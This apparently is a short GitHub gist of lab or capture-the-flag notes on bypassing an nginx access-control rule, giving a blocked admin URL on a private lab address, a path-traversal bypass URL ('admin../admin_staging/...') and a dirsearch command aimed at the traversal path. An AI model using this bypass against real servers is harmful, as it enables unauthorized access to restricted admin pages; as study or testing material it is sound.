Skip to content

Instantly share code, notes, and snippets.

@shollingsworth
Created February 10, 2022 01:41
Show Gist options
  • Save shollingsworth/17bd73764f20ca06f1ae7ea14f9df277 to your computer and use it in GitHub Desktop.
Save shollingsworth/17bd73764f20ca06f1ae7ea14f9df277 to your computer and use it in GitHub Desktop.
nginx acl bypass
# blocked
http://10.10.10.249/admin/
# bypassed
http://10.10.10.249/admin../admin_staging/index.php?page=user.php
# dirsearch example
dirsearch -u http://10.10.10.249/admin..
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment